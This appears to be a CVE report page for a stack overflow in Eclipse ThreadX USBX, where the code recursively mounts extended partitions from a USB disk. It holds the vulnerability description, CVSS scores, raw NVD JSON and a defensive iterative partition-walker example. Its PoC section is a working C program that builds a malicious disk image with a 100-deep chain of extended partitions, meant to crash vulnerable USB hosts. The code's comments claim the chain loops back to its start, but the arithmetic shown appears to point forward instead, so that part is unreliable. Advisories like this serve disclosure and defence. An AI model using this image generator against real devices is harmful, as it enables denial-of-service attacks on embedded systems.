Security Vulnerability Report
CVE-2025-55095 CVSS 4.2 MEDIUM

CVE-2025-55095

Published: 2026-01-27 16:16:15
Last Modified: 2026-04-02 20:28:49

Description

The function _ux_host_class_storage_media_mount() is responsible for mounting partitions on a USB mass storage device. When it encounters an extended partition entry in the partition table, it recursively calls itself to mount the next logical partition.

This recursion occurs in _ux_host_class_storage_partition_read(), which parses up to four partition entries. If an extended partition is found (with type UX_HOST_CLASS_STORAGE_PARTITION_EXTENDED or EXTENDED_LBA_MAPPED), the code invokes:

    _ux_host_class_storage_media_mount(storage, sector + _ux_utility_long_get(...));

There is no limit on the recursion depth or tracking of visited sectors. As a result, a malicious or malformed disk image can include cyclic or excessively deep chains of extended partitions, causing the function to recurse until stack overflow occurs.
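The two missing controls named in the description, a depth limit and visited-sector tracking, can be shown in an iterative table walker. This is an added example, not USBX code and not the project's fix; walk_partitions, read_fn, fake_read, walk_sample and the MAX_EBR_DEPTH value are hypothetical, the media is constructed in memory, and only the first extended entry of each table is followed.

```c
#include <stdint.h>
#include <string.h>

#define SECTOR_SIZE   512
#define PT_OFFSET     446   /* partition table offset inside an MBR/EBR sector */
#define PT_EXTENDED   0x05
#define PT_EXT_LBA    0x0F
#define MAX_EBR_DEPTH 16    /* assumed cap; size it to the product's needs */
enum { WALK_OK = 0, WALK_TOO_DEEP = -1, WALK_CYCLE = -2, WALK_IO = -3 };
typedef int (*read_fn)(uint32_t lba, uint8_t *buf);   /* hypothetical sector reader */
static uint32_t le32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }

/* Walk the table at 'lba' and the extended chain behind it without recursion:
   stack use is constant, depth is capped, and a revisited sector is rejected. */
int walk_partitions(read_fn rd, uint32_t lba, int *mounted) {
    uint32_t seen[MAX_EBR_DEPTH];
    uint8_t buf[SECTOR_SIZE];
    *mounted = 0;
    for (int depth = 0; ; depth++) {
        if (depth == MAX_EBR_DEPTH) return WALK_TOO_DEEP;
        for (int i = 0; i < depth; i++)
            if (seen[i] == lba) return WALK_CYCLE;     /* sector already parsed */
        seen[depth] = lba;
        if (rd(lba, buf) != 0) return WALK_IO;
        const uint8_t *ext = NULL;
        for (int e = 0; e < 4; e++) {
            const uint8_t *ent = buf + PT_OFFSET + 16 * e;
            if (ent[4] == PT_EXTENDED || ent[4] == PT_EXT_LBA) ext = ext ? ext : ent;
            else if (ent[4] != 0) (*mounted)++;        /* stand-in for the real mount */
        }
        if (!ext) return WALK_OK;
        lba += le32(ext + 8);   /* same "sector + relative start" step as the description */
    }
}

/* Constructed media: tables sit g_rel sectors apart; g_rel == 0 links a table to itself. */
static uint32_t g_rel, g_links;
int fake_read(uint32_t lba, uint8_t *buf) {
    memset(buf, 0, SECTOR_SIZE);
    buf[PT_OFFSET + 4] = 0x0C;                          /* entry 0: data partition */
    if (g_rel != 0 && lba / g_rel >= g_links) return 0; /* chain ends here */
    buf[PT_OFFSET + 16 + 4] = PT_EXT_LBA;               /* entry 1: extended link */
    buf[PT_OFFSET + 16 + 8] = (uint8_t)g_rel;           /* relative start, low byte */
    return 0;
}
int walk_sample(uint32_t rel, uint32_t links, int *mounted) {
    g_rel = rel; g_links = links;
    return walk_partitions(fake_read, 0, mounted);
}
```

walk_sample(8, 3, &n) walks a well-formed four-table chain, walk_sample(0, 1, &n) a self-referencing table, and walk_sample(8, 1000, &n) a chain deeper than the cap.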

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_usbx:*:*:*:*:*:*:*:* - VULNERABLE
eclipse-threadx/usbx < latest fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// PoC: Create a malicious disk image with cyclic extended partition chain
// to trigger stack overflow in _ux_host_class_storage_media_mount()

#pragma pack(push, 1)
typedef struct {
    unsigned char status;
    unsigned char start_head;
    unsigned short start_sector:6;
    unsigned short start_cylinder:10;
    unsigned char type;
    unsigned char end_head;
    unsigned short end_sector:6;
    unsigned short end_cylinder:10;
    unsigned int relative_sectors;
    unsigned int total_sectors;
} PartitionEntry;

typedef struct {
    unsigned char bootstrap[446];
    PartitionEntry partitions[4];
    unsigned short signature;
} MBR;
#pragma pack(pop)

void create_malicious_image(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to create image");
        return;
    }

    MBR mbr = {0};

    // Primary partition 1: Normal partition
    mbr.partitions[0].status = 0x80;
    mbr.partitions[0].type = 0x0C; // FAT32 LBA
    mbr.partitions[0].relative_sectors = 2048;
    mbr.partitions[0].total_sectors = 102400;

    // Primary partition 2: Extended partition (entry point to chain)
    mbr.partitions[1].status = 0x00;
    mbr.partitions[1].type = 0x0F; // Extended partition
    mbr.partitions[1].relative_sectors = 104448;
    mbr.partitions[1].total_sectors = 102400;

    // Set EBR chain: Each EBR points back to sector 104448 (cyclic)
    // This creates infinite recursion in _ux_host_class_storage_media_mount()
    unsigned int ebr_sector = 104448;
    for (int i = 0; i < 100; i++) { // Create deep chain
        fseek(fp, ebr_sector * 512, SEEK_SET);

        MBR ebr = {0};
        ebr.partitions[0].type = 0x07; // NTFS
        ebr.partitions[0].relative_sectors = 1;
        ebr.partitions[0].total_sectors = 2047;

        // Extended partition points to next EBR (creates cycle)
        if (i < 99) {
            ebr.partitions[1].type = 0x0F;
            ebr.partitions[1].relative_sectors = 2048;
            ebr.partitions[1].total_sectors = 2048;
            ebr_sector = ebr_sector + 2048;
        } else {
            // Last EBR points back to first EBR (cycle)
            ebr.partitions[1].type = 0x0F;
            ebr.partitions[1].relative_sectors = 104448;
            ebr.partitions[1].total_sectors = 2048;
        }

        ebr.signature = 0xAA55;
        fwrite(&ebr, sizeof(MBR), 1, fp);
    }

    mbr.signature = 0xAA55;
    fseek(fp, 0, SEEK_SET);
    fwrite(&mbr, sizeof(MBR), 1, fp);
    fclose(fp);

    printf("Malicious image created: %s\n", filename);
    printf("Contains cyclic extended partition chain (100 EBRs forming cycle)\n");
}

int main() {
    create_malicious_image("malicious_usb_image.img");
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55095", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.930", "lastModified": "2026-04-02T20:28:48.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The function _ux_host_class_storage_media_mount() is responsible for mounting partitions on a USB mass storage device. When it encounters an extended partition entry in the partition table, it recursively calls itself to mount the next logical partition.\n\nThis recursion occurs in _ux_host_class_storage_partition_read(), which parses up to four partition entries. If an extended partition is found (with type UX_HOST_CLASS_STORAGE_PARTITION_EXTENDED or EXTENDED_LBA_MAPPED), the code invokes:\n _ux_host_class_storage_media_mount(storage, sector + _ux_utility_long_get(...));\n\n\nThere is no limit on the recursion depth or tracking of visited sectors. As a result, a malicious or malformed disk image can include cyclic or excessively deep chains of extended partitions, causing the function to recurse until stack overflow occurs."}, {"lang": "es", "value": "La función _ux_host_class_storage_media_mount() es responsable de montar particiones en un dispositivo de almacenamiento masivo USB. Cuando encuentra una entrada de partición extendida en la tabla de particiones, se llama a sí misma recursivamente para montar la siguiente partición lógica.\n\nEsta recursión ocurre en _ux_host_class_storage_partition_read(), que analiza hasta cuatro entradas de partición. Si se encuentra una partición extendida (con el tipo UX_HOST_CLASS_STORAGE_PARTITION_EXTENDED o EXTENDED_LBA_MAPPED), el código invoca:\n _ux_host_class_storage_media_mount(storage, sector + _ux_utility_long_get(...));\n\nNo hay límite en la profundidad de recursión ni seguimiento de los sectores visitados. 
Como resultado, una imagen de disco maliciosa o malformada puede incluir cadenas cíclicas o excesivamente profundas de particiones extendidas, lo que hace que la función recurra hasta que ocurra un desbordamiento de pila."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-674"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_usbx:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.4.2", "matchCriteriaId": "DF35E739-A6C8-4A49-B499-ED473CE276CF"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/usbx/security/advisories/GHSA-qfmp-wch9-rpv2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}